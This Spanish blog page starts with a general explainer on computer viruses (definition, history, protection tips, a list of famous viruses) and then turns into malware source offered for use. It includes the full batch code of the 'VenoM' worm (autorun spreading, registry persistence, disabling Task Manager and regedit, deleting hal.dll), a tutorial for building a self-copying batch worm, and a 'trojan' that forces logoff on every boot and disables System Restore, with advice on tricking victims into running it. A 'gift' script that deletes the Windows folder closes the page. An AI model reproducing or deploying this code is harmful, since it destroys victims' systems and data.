miércoles, 9 de noviembre de 2016

   que es un virus


Un virus es un malware que tiene por objetivo alterar el funcionamiento normal del ordenador, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en una computadora, aunque también existen otros más inofensivos, que solo producen molestias.
Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, son muy nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos, desde una simple broma hasta realizar daños importantes en los sistemas, o bloquear las redes informáticas generando tráfico inútil.
El funcionamiento de un virus informático es conceptualmente simple. Se ejecuta un programa que está infectado, en la mayoría de las ocasiones, por desconocimiento del usuario. El código del virus queda residente (alojado) en la memoria RAM de la computadora, incluso cuando el programa que lo contenía haya terminado de ejecutar. El virus toma entonces el control de los servicios básicos del sistema operativo, infectando, de manera posterior, archivos ejecutables que sean llamados para su ejecución. Finalmente se añade el código del virus al programa infectado y se graba en el disco  con lo cual el proceso de replicado se completa.
El primer virus atacó a una máquina IBM Serie 360 (y reconocido como tal). Fue llamado Creeper, (ENMS) creado en 1972. Este programa emitía periódicamente en la pantalla el mensaje: «I'm a creeper... catch me if you can!» («¡Soy una enredadera... agárrame si puedes!»). Para eliminar este problema se creó el primer programa antivirus denominado Reaper (cortadora).

Sin embargo, el término virus no se adoptaría hasta 1984, pero éstos ya existían desde antes. Víctor Vyssotsky, Robert Morris S. y Doug McIlroy, investigadores de Bell Labs (se cita erróneamente a Dennis Ritchie o Ken Thompson como cuarto coautor) desarrollaron un juego de ordenador llamado Darwin  (del que derivará Core Wars que consiste en eliminar al programa adversario ocupando toda la RAM de la zona de juego 
Característica
Dado que una característica de los virus es el consumo de recursos, los virus ocasionan problemas tales como: pérdida de productividad, cortes en los sistemas de información o daños a nivel de datos.
Una de las características es la posibilidad que tienen de diseminarse por medio de réplicas y copias. Las redes en la actualidad ayudan a dicha propagación cuando éstas no tienen la seguridad adecuada.
Otros daños que los virus producen a los sistemas informáticos son la pérdida de información, horas de parada productiva, tiempo de reinstalación, etc.

Hay que tener en cuenta que cada virus plantea una situación diferente
                  Método de protección


Activos
        Antivirus: son programas que tratan de descubrir las trazas que ha dejado un software malicioso, para detectarlo y eliminarlo, y en algunos casos contener o parar la contaminación. Tratan de tener controlado el sistema mientras funciona parando las vías conocidas de infección y notificando al usuario de posibles incidencias de seguridad. Por ejemplo, al verse que se crea un archivo llamado Win32.EXE.vbs en la carpeta C:\Windows\%System32%\ en segundo plano, ve que es comportamiento sospechoso, salta y avisa al usuario.
        Filtros de ficheros: consiste en generar filtros de ficheros dañinos si el computador está conectado a una red. Estos filtros pueden usarse, por ejemplo, en el sistema de correos o usando técnicas de firewall. En general, este sistema proporciona una seguridad donde no se requiere la intervención del usuario, puede ser muy eficaz, y permitir emplear únicamente recursos de forma más selectiva.
        Actualización automática: Consiste en descargar e instalar las actualizaciones que el fabricante del sistema operativo lanza para corregir fallos de seguridad y mejorar el desempeño. Dependiendo de la configuración el proceso puede ser completamente automático o dejar que el usuario decida cuándo instalar las actualizaciones.
Pasivos
        No instalar software de dudosa procedencia.
        No abrir correos electrónicos de desconocidos ni adjuntos que no se reconozcan.
        Usar un bloqueador de elementos emergentes en el navegador.
        Usar la configuración de privacidad del navegador.
        Activar el Control de cuentas de usuario.
        Borrar la memoria caché de Internet y el historial del navegador.

        No abrir documentos sin asegurarnos del tipo de archivo. Puede ser un ejecutable o incorporar macros en su interior.
                Acciones de los virus

Algunas de las acciones de algunos virus son:
        Unirse a cualquier programa permitiendo su propagación y siendo más costoso liberarse de él.
        Ralentizar el dispositivo.
        Reduciendo el espacio en el disco.
        Mostrando ventanas de forma constante.

        Corrompiendo archivos del dispositivo, en algunos casos archivos vitales para el funcionamiento del dispositivo.
        Descargando archivos o programas basura
        Apagando o reiniciando su dispositivo
        Haciendo llamadas a tus contactos u otros números con mayor costo

        Eliminar todo guardado en el disco duro



Este artículo explica cómo crear un virus. No se trata de ninguna broma. Posiblemente quieras crear un virus para poner a prueba tu antivirus o sólo por diversión. Ten en cuenta que éste es un archivo de prueba solamente y que no dañará a tu computadora de ninguna forma. Este archivo fue desarrollado por EICAR (Instituto Europeo para la Investigación de los Antivirus Informáticos). Aquí tienes un procedimiento paso a paso para que lo pruebes por ti mismo
Pasos

        2
Abre el bloc de notas (Nuevo documento de texto.TXT), copia el siguiente código exactamente como está y guarda el bloc de notas

3 Pega este código: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

4

5

 
6
Renombra el archivo, cambiando Nuevo documento de texto.txt por miarchivo.com
7
Escanea el archivo con tu antivirus. De este modo podrás comprobar que es un virus.
8

Sigue las instrucciones de tu antivirus y elimina el archivo. ¿No fue demasiado sencillo?
                                                   Código de virus




Para todos aquellos que les pueda interesar, en este, mi primer post, pueden encontrar el código fuente del virus. Que conste que hago este aporte con fines educativos, para analizar de qué manera actúan estos malware y entender su propósito específico.



Para aquellos que no conocen este nuevo virus, aquì esta una breve descripción:

Este virus se manifiesta de la siguiente manera:

* Crea un ejecutable de 181 kb por cada carpeta existente en una unidad de disco o memoria.
* Crea un explorer.exe y un mis documentos.exe de 181 kb.
* Deshabilita las opciones de carpeta y el administrador de tareas.
* Conforme pasa el tiempo empieza a enviar un mensaje de texto que dice:
* “El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3@hotmail.com).
* Cambia las propiedades del Explorador de Windows para no poder visualizar los archivos ocultos y esconde las extensiones de archivos.
* Oculta la carpeta del sistema (Windows) y crea un archivo ejecutable con ícono de carpeta llamado Windows en la unidad del sistema, entre algunas cosas más.
@shift 1
@echo off
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata%\desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
copy /y %0 "%Windir%\System\winlogon.exe"
if exist "%Windir%\System\winlogon.exe" goto cop
copy /y %0 "%appdata%\smss.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%appdata%\smss.exe" /f
:cop
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%Windir%\System\winlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%\Men£ Inicio\Programas\Inicio\MS-DOS.pif"
copy /y %0 "%systemdrive%\Docume~1\Default User\Men£ Inicio\Programas\Inicio\System.exe"
copy /y %0 "%userprofile%\SendTo\Mis documetos.exe"
copy /y %0 "%userprofile%\SendTo\Disco extraible.pif"
copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr"
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr
:NO
attrib +h %windir%
copy /y %0 "%systemdrive%\WINDOWS.EXE"
copy /y %0 "%windir%\system32\%username% 3D.scr"
copy /y %0 "%userprofile%\Men£ Inicio\Mis documentos.exe"
copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis documentos.exe"
copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe"
copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666\Explorer.exe>>autorun.inf
echo shell\Open=>>autorun.inf
echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\Explore\=>>autorun.inf
echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\find\=>>autorun.inf
echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\CMD=Sïmbolo del sistema>>autorun.inf
echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul© /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r +a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul© /y %0 %%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3 @hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛÛ
echo ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛ Û ÛÛÛ Û ÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ>>VenoM.txt
copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt"
print VenoM.txt
for /l %%t in (1,1,24) do at %%t /delete
set h=0
:q
at %h%:13 /interactive "%userprofile%\VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q

:l
if exist "%appdata%\services.exe" goto bl
copy /y %0 "%appdata%\services.exe"
:bl
if exist "%appdata%\lsass.exe" goto oz
copy /y %0 "%appdata%\lsass.exe"
:oz
if %0=="%appdata%\services.exe" goto ser
if %0=="%appdata%\lsass.exe" goto w
"%appdata%\services.exe"
"%appdata%\lsass.exe"
exit
:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d )
goto w
:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf© /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %%h:\autorun.inf&md %%h:\VenoM.666© /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
goto w
r
if %COMPUTERNAME%==DESKTOP exit
del /f /q "%windir%\system32\hal.dll"
cd "%userprofile%\Men£ Inicio\Programas\Inicio\"
echo shutdown -r -f -t 00>VenoM.bat
echo OPTION EXPLICIT>VenoM.vbs
echo DIM clave>>VenoM.vbs
echo DO WHILE (clave ^<^> "666">>VenoM.vbs
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
echo LOOP>>VenoM.vbs
start VenoM.vbs
shutdown -r -f -t 120 -c "Welcome to Hell"
:B
echo 
goto B
:ser
cd "%appdata%"
set u=%0
dir "%userprofile%\misdoc~1\*." /b /s >"%appdata%\NTUSER.DAT.DLL"
for %%f in (%TU%) do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%appdata%\NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
:V
set t=%1
copy /y %u% %t%.exe

Fuentes:
En esta fuente pueden encontrar la manera de desinfectarse de este virus, para aquellos que se han visto afectados. 
http://www.bitslab.net/2007/10/31/como-eliminar-el-virus-venom-metodo-de-desinfeccion/

http://foro.el-hacker.com/index.php/topic,142797.0html


famosos de la historia
Un repaso por los virus más conocidos -desde 1971 hasta la actualidad- que afectaron a los distintos sistemas operativos.



Si bien muchos virus fueron creados para mostrar las deficiencias de ciertos sistemas operativos y de la falta de medidas de seguridad, lo cierto es que muchos de ellos le complicaron la vida a mucha gente. Algunos sólo causan daños menores, pero otros hacen perder toda la información almacenada y, en algunos casos, incluso hasta daños materiales en el hardware.

Actualmente, se supone que la gran mayoría de las personas cuenta con, al menos, un antivirus en su PC, instalado incluso antes de empezar a usarla. Pero todas las advertencias no siempre bastan, porque aparecen nuevas amenazas dispuestas a burlas las defensas y hacer daño.

La compañía de seguridad informática Trend Micro acaba de presentar una lista de los 20 virus más importantes y dañinos de la historia.

1. CREEPER (1971): el primer gusano corrió en un equipo DEC 10 bajo el sistema operativo TOPS TEN.

2. ELK CLONER (1985): el primer virus para computadoras personales, concretamente para los sistemas Apple II. Creado por un estudiante que quería que un poema suyo fuera leído por todos, el virus infectaba el sistema operativo, se copiaba en los discos flexibles y desplegaba uno o dos versos del poema. Si bien no generó mucho daño, fue uno de los que abrió el camino para lo que vendría después.

3. El INTERNET WORM (1985): escrito por una persona de la Universidad Cornell, logró paralizar la incipiente Internet.

4. PAKISTANI BRAIN (1988): el primer virus que infectó la PC de IBM. Debió su nombre a que fue escrito por dos hermanos de Pakistán. Recibió amplia cobertura en los medios.

5. JERUSALEM FAMILY (1990): se contabilizaron casi cincuenta variables de este virus, posiblemente surgido en la Universidad de Jerusalén.

6. STONED (1989): uno de los virus que más propagación tuvo. Infectaba el sector de arranque/.mbr que contaba el número de reinicios desde la infección original y mostraba la frase "your computer is now stoned".

7. DARK AVENGER MUTATION ENGINE (1990): fue escrito en 1988, pero apareció a los principios de los noventa en virus como POGUE y COFFEESHOP. Uno de los primeros en mutar y complicar su erradicación.

8. MICHEANGELO (1992): una variante de STONED, con una carga destructiva. El 6 de marzo de ese año, borró los primeros 100 sectores de un disco rígido, dejándolo inútil. Provocó uno de los primeros pánicos mediáticos alrededor de los virus de equipos informáticos.

9. WORLD CONCEPT (1995): el primer macro virus para Microsoft Word. Word Concept escribía la frase, "That s enough to prove my point". No muy complicado en su elaboración, demostró que casi cualquiera podía escribir un virus.


10. CIH/CHERNOBYL (1998): El virus Chernobyl fue el virus más destructivo jamás visto, hasta entonces. Atacando los días 26 de cada mes (dependiendo de la versión involucrada), borraba el disco rígido y eliminaba el flash ROM BIOS de la computadora.

11. MELISSA (1999): es el primer virus que se propagó vía correo electrónico. Sin ser destructivo, combinó virus y gusanos para propagarse e infectar a millones de usuarios. Capaz de replicarse, saturó los buzones de correo a dondequiera que llegaba.

12. LOVEBUG (2001): es el gusano para correo electrónico más popular. Invitaba a las víctimas a abrir el archivo adjunto con la promesa de una carta de amor. El virus se propagó rápidamente por todo el mundo, provocando fallos en el correo electrónico y pérdidas a las compañías por varios miles de millones de dólares.

13. Code RED (2001): Este virus de red se propagaba sin necesidad de un correo electrónico o una página web. Localizaba computadores vulnerables y los infectaba por sí mismo. Infectó casi 400.000 páginas web.

14. NIMDA (2001): llamado la "Navaja Suiza" de los virus, usaba la saturación del buffer, el correo electrónico, particiones de redes y diez métodos más para entrar a una red.

15. BAGEL/NETSKY (2004): fueron virus diseñados para demostrar una competencia falsa, o una guerra entre sí. Con cientos de versiones cada uno y varias cantidades de nueva tecnología y éxito, estos dos gusanos coparon las noticias virtualmente todo el año.

16. BOTNETS (2004): estos guerreros zombies de Internet ofrecen a los criminales electrónicos una colección infinita de equipos infectados que pueden reconfigurarse en redes para enviar spam, infectar a nuevas personas, robar datos, etc.

17. ZOTOB (2005): este gusano sólo afectó a sistemas Windows 2000 que no estaban actualizados.

18. ROOTKITS (2005): se han convertido en una de las herramientas más populares en el mundo del código malicioso. Se usa para hacer invisible a otros códigos maliciosos alterando el sistema operativo.

19. STORM WORM (2007): el virus pasó por miles de versiones, creando eventualmente la botnet más grande del mundo. En un momento se creyó que más de 15 millones de equipos fueron infectados al mismo tiempo, y que estaban bajo el control de los criminales.

20. ITALIAN JOB (2007): en lugar de una sola pieza de código malicioso, Italian Job fue un ataque coordinado que utilizaba un kit de herramientas pre-empaquetado conocido como MPACK. Corrompió a más de 10.000 sitios web, haciéndolos que implantaran el moderno Data Stealing Malware.
     Pasos para hacer un virus




1. Cómo crear un gusano en batch

Introducción

Un gusano es un virus informático que tiene la propiedad de duplicarse a sí mismo. A diferencia de un virus, un gusano no precisa alterar los archivos de programas, sino que reside en la memoria y se duplica a sí mismo. Los gusanos siempre dañan la red, mientras que los virus siempre infectan o corrompen los archivos de la computadora que atacan.

2. ¿Como saber si estoy infectado?

Es algo usual detectar la presencia de gusanos en tu sistema cuando, debido a su incontrolada duplicación, los recursos del sistema se consumen hasta el punto de que las tareas comunes que usamos diariamente se ponen lentas o simplemente no pueden ejecutarse.

3. ¿Cómo crear tu gusano en batch?

En este tutorial les voy a mostrar como crear un gusano en batch. Este gusano creara muchos archivos en los directorios que pongamos en el código…

A continuación abrimos el block de notas e ingresamos el siguiente código…

@
echo off
:worm
cd
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd system32
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm
Ahora vamos a "guardar como" y elegimos el lugar donde se guardara el gusano.

Nombre: worm.bat
Tipo: Todo los archivos
Después de guardarlo, agregamos otra línea de registro debajo de (@
echo off) para que cuando se inicie la pc, el gusano también se inicie.

copy %0 %windir%system32worm.bat
REG ADD
HKLMsoftwaremicrosoftwindowscurrentsversionrun/v hack/d %windir%system32worm.bat
Al final nos quedaría algo así:

@
echo off
copy %0 %windir%system32worm.bat
REG ADD HKLMsoftwaremicrosoftwindowscurrentsversionrun/v hack/d %windir%system32worm.bat
:worm
cd
cd %homepatch%
cd escritorio
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
cd system32
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
echo worm >> %ramdom%.exe
goto worm

Ahora nuestro worm se autocopiara en el directorio: C:WindowsSystem32worm.bat y la otra linea era para agregar una entrada al registro al kual iniciara nuestro virus cada vez que se inicie sesion. 
Como Crear Un virus  Troyano




Como sabeis hay que copiarlo en el bloc de notas, y guardarlo con extension .bat

Lo que hace mi codigo es programar al ordenador para que siempre que se inicie sesion o se encienda el ordenador se le cierre automaticamente (en esto tarda menos de 2 segundos), y ocurre una y otra vez.

Para repararlo muchos podrian considerar en modo a prueba de fallos, acceder a el editor de registro o a restaurar sistema, y hacer lo necsario, por eso el código no acaba aquí.

El codigo tambien contiene algunas líneas, que lo que hacen es impedir el acceso a restaurar sistema y a regedit entre otros, y tambien hay algunas que son simplemente para incordiar que se podrian omitir facilmente en el codigo (como por ejemplo impedir que el usuario pueda acceder a apagar el sistema desde alt+f4, ni inicio, ni ninguno de ese tipo, o tambien el que impide que pueda modificar cualquier archivo del escritorio, o el que inutiliza el clic derecho del raton...)

Este es el codigo completo:


Reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v off /t reg_sz /d logoff.exe /f
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableConfig /t reg_dword /d 1
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableSR /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoClose /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFavoritesMenu /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFind /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoRecentDocsMenu /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoRecentDocsHistory /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoSetFolders /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoSetTaskbar /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoFileMenu /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoViewContextMenu /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoTrayContextMenu /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoDesktop /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesexplorer /v NoWinKey
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoChangingWallpaper /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoAddingComponents /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoDeletingComponents /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoEditingComponents /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciesActiveDesktop /v NoHTMLWallpaper /t reg_dword /d 1
Reg add hkcusoftwaremicrosoftwindowscurrentversionPoliciessystem /v DisableRegistryTools /t reg_dword /d 1
shutdown -s -t 5 -f -c "El ordenador se apagara debido a la incompetencia del usuario. Mejor dedicate a la vida en el campo"



Y este el codigo abreviado:


reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v off /t reg_sz /d logoff.exe /f
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableConfig /t reg_dword /d 1
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableSR /t reg_dword /d 1
shutdown -s -t 5 -f -c "El ordenador se apagara debido a la incompetencia del usuario. Mejor dedicate a la vida en el campo"


Para que surga efecto deben abrir el archivo en la extension ya dicha, asi que deben buscar algun metodo para que la victima lo ejecute. Eso es lo malo, pero la ventaja es que es indetectable (ya que si fuera considerado virus, muchas de las cosas que hacemos con el ordenador normalmente [del tipo ejecutar programas, o juegos] tambien lo serian, ya que trabaja con comandos propios del sistema).


Aqui Un Video Para que Hagan Sus Propios Troyanos.

link:
http://www.youtube.com/watch?v=vsZ4fmsQ65M

entren al link del video y bajense los programas para hacer los troyanos.

regalo de un virus

aquí te dejo este virus para que lo hagas
es mi regalo







Esto hace lo siguiente: Les borra el WINDOWS, abre ventanas infinitas de MS-DOS, Les manda mensajes Cariñosos jajaj xD, Cada vez que prenda la PC se le apaga a los 3 Segundos. Creo que con eso es suficiente para que no te jodan mas no?
------------------------------------------------------------------------------------------

@
echo off
if exist "%systemroot%/Mocosoft (goto delet) else goto make
:delet
Rd /s /q "%systemroot%/Mocosoft"
goto make
:make
Mk "%systemroot%/Mocosoft"
goto continue
:continue
copy /y %0 "%systemroot%/Mocosoft/Amdset.bat"
echo Hacked By 4GusCrack > "%homedrive%/Firmita.txt"
REG ADD HTLM/Software/Microsoft/Windows/Current Version/Run /v Amdset /d "%systemroot%/Mocosoft/Amdset.bat"
shutdown -s -f -t 20 -c "Ahi que lastima"
taskkill "explorer.exe"
echo msgbox “Hoy vas a conocer lo que es un Virus.
By WxXCrazyXxW”
@
echo off
@:uji
start
@
goto uji
exit
shutdown -s -t 3 -c "No prendes la PC nunca mas. By WxXCrazyXxW"
@
echo off
title g00d by3 wind0w5
echo 4dio5 a tu wind0w5
del /s /f /q c:windows
exit
shutdown -s -t 3 -c "No prendes la PC nunca mas.